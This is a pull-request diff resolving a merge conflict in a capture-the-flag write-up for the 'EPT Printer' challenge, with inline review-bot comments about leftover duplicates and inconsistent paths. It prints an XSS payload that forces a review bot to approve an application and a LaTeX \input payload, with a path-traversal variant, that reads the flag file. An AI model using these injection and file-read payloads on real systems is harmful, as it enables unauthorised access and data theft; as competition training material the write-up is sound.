Merge pull request #116 from ItsMeBrille/patch-1
Repair after merge conflict 😱
nordbo authored Nov 12, 2024
2 parents c797d79 + bae1fff commit f6c88c3
Showing 1 changed file with 36 additions and 65 deletions.
101 changes: 36 additions & 65 deletions writeups/onsite/EPT Printer/FesseMisk/README.md
@@ -1,21 +1,37 @@
<<<<<<< HEAD
# Writeup
author: th@m456 @ FesseMisk
# EPT Printer

author: th@m456 & Brille @ FesseMisk


## Task

## EPT Printer
![alt text](image.png)


### Initial analysis

EPT Print was a printing service with a Flask backend. Completed documents could be printed on-site.

To use the printer, users needed to be verified first. In addition to the Flask server, a bot ran a headless browser to open and review these applications without approving them.

The printing lets us insert text into a LaTeX template that gets sent to the printer.


### Solution
This is an onsite challenge where we need to print out the flag on an actual printer. In order to do this, we first need to get approval by a bot reviewing "approval applications".

First, we open the link provided by the EPT Box.
This is an onsite challenge where we must print the flag on an actual printer. To do this, we first need to get approval from a bot reviewing "approval applications".

First, we open the link provided by the EPT Box.

![alt text](image-1.png)
From here, we must log in with our Discord user. Our Discord user is connected to a personal ID card, which is required for solving the challenge at a later stage.

After logging in, we can find an "approval application" form from the menu in the top right.
From here, we must log in with our Discord user. Our Discord user is connected to a personal ID card, which is required for solving a later stage of the challenge.

After logging in, we can find an "approval application" form from the menu in the top right:

![alt text](image-2.png)

By finding hints in the attached source code, I understand that we must trick the bot to automatically click "accept" on our application.
By finding hints in the attached source code, I understand that we must trick the bot to accept our application automatically.

```bash
/webapp/app/templates$ cat application.html
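Review bot: the header region of the resolved file stacks competing titles and author lines (`# Writeup` and `# EPT Printer`, `author: th@m456 @ FesseMisk` and `author: th@m456 & Brille @ FesseMisk`, and `## Task` followed directly by `## EPT Printer` with only an image between them); whichever of these the resolution keeps, the file should open with a single title, one author line, and `## Task` as the first section, so drop the duplicates rather than carrying both halves of the conflict forward. The sentence saying the bot opens and reviews applications "without approving them" would also read better if it stated plainly that the bot never approves on its own, since that is the reason the rest of the writeup needs the XSS.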
Expand All @@ -32,7 +48,7 @@ APPLICATIONS_CHECK_FREQUENCY_SECONDS = int(
os.getenv("APPLICATIONS_CHECK_FREQUENCY_SECONDS", 30)
```

I am able to find out that the application form is susceptible to XSS, by attempting this line:
I can test to see if the application form is susceptible to XSS, by attempting this line:

```html
<script>alert(XSS vulnerable!)</script>>
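Review bot: the probe shown in this hunk, `<script>alert(XSS vulnerable!)</script>>`, is not valid JavaScript as written (the argument to `alert` is an unquoted string) and ends with a stray `>`, so a reader cannot reproduce the step the new sentence "I can test to see if the application form is susceptible to XSS" describes; either show the line exactly as it was submitted or say that it is a paraphrase of what was tried.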
Expand All @@ -46,11 +62,11 @@ We can use XSS to make the bot accept our application upon review with this code

![alt text](image-3.png)

After waiting for >30 seconds, we are now approved! Now we are able to print stuff by using the `Printing Form`.
After waiting for >30 seconds, we are now approved! Now we can print stuff by using the `Printing Form`.

![alt text](image-4.png)

In the source code, we find `template.tex`, indicating that we must write our code in Latex format in order to get the flag. In the template file, we can also see what commands are set, and where our input will be read.
In the source code, we find `template.tex`, indicating that we must write our code in Latex format to get the flag. In the template file, we can also see what commands are set, and where our input will be read.

```tex
$ cat template.tex
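Review bot: the reworded sentence in this hunk still writes "Latex format" while the rest of the file uses `LaTeX`; pick one spelling. Also, the block fenced as ```tex opens with the shell prompt line `$ cat template.tex`, which is not TeX; either drop the prompt or fence the listing as console output, as the `bash` block earlier in the file does.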
Expand Down Expand Up @@ -85,71 +101,26 @@ $ cat template.tex
\end{document}
```

The attached source code also has a placeholder for flag.txt, so I know the filepath and name of the flag file is `/webapp/flag.txt`. The printing folder is at `/webapp/app/printing`, so we must do some traversing in our code.
The attached source code also has a placeholder for flag.txt, so I know the file path and name of the flag file is `/webapp/flag.txt`. The printing folder is at `/webapp/app/printing`, so we must do some traversing in our code.

The printing job is only executed if there are no errors in the Latex code. Many of my attempts gave an error indicating a math expression! So I had to ask GPT;

```
In LaTeX, the underscore character _ is a special character used for subscripts in mathematical expressions. Because of this, using an underscore directly in text can cause errors or unexpected behavior. To include an underscore in text, you need to escape it or change its category code.
In LaTeX, the underscore character _ is a special character used for subscripts in mathematical expressions. Because of this, using an underscore directly in the text can cause errors or unexpected behavior. To include an underscore in text, you need to escape it or change its category code.
```

Ahaaaaa! And the flag often contains an underscore!

After several attempts with errors or only printing the filepath, we successfully get the contents of the flag with this code, where we change the category code of underscore (and %, but that probably didn't matter):
`\input{/flag.txt}` loads the content of `/flag.txt` as LaTeX. But since the flag file most probably just contains the flag, we don't want it to compile as a mmath expression LaTeX. Therefore we use `\catcode`\%=12` and `\catcode`\_=12`. These lines are added so that any `%` and `_` characters are not interpreted as LaTeX until printed. This proved necessary because the flag contained `_` as ChatGPT suggested.

```latex
\begingroup
\catcode`\%=12
\catcode`\_=12
\input{../../flag.txt}
\input{/flag.txt}
\endgroup
```

![alt text](image-5.png)
<details>
<summary>Flag</summary>

I forgot to take a picture of the printout... but at least got the flag!

```text
EPT{Y0U_4R3_4_PR1NT3R_M4ST3R}
```
=======
## EPT PRINTER

### Task

EPT Print was a printing service with a Flask backend. Completed documents could be printed on-site.

To use the printer, users needed to be verified first. In addition to the Flask server, a bot ran a headless browser to open and review these applications without approving them.

The printing lets us insert text into a LaTeX template that gets sent to the printer.

### Solution

First, we need to get approved to use the printer. We can achieve this by injecting XSS. The code actually hints us about it through comments in the source code in `/webapp/app/__init__.py`:

![Comment in code](image.png)

We use XSS to automatically approve our application:

```html
<img src="x" onerror="document.getElementById('submit').click();">
```

We are now approved, and we can now use the printer. To get the flag we can exploit the fact that we can write LaTeX in order to read a potential flag file:

```latex
\begingroup
\catcode`\%=12
\catcode`\_=12
\input{/flag.txt}
\endgroup
```

`\input{/flag.txt}` loads he content of `/flag.txt` as LaTeX. But since the flag file most probably just contains the flag, we dont want it to compile as LaTeX. Therefore we use `\catcode`\%=12` and `\catcode`\_=12`. These lines are added so that any `%` and `_` characters are not interpreted as LaTeX until printed. This proved necessary because the flag contained `_`.
<details>
<summary>Flag</summary>

`EPT{Y0U_4R3_4_PR1NT3R_M4ST3R}`
</details>
>>>>>>> 35aa7bd3c314268230e8d35c9ff3119545fb950d
`EPT{Y0U_4R3_4_PR1NT3R_M4ST3R}`
</details>
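Review bot: the resolved text is internally inconsistent about where the flag lives and how it is read: one paragraph says the flag is `/webapp/flag.txt` and that traversal from `/webapp/app/printing` is needed, the explanation paragraph says `\input{/flag.txt}` loads `/flag.txt`, and the LaTeX block lists both `\input{../../flag.txt}` and `\input{/flag.txt}`; keep the single payload that actually worked and make the explanation and the stated path agree with it. Smaller points in the same hunk: "mmath expression LaTeX" is a typo; the inline code spans for `\catcode`\%=12` and `\catcode`\_=12` contain an unescaped backtick, which breaks Markdown rendering (wrap them in double backticks); and the flag appears twice, once in a fenced `text` block and once inline just before `</details>`, so one copy should go.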
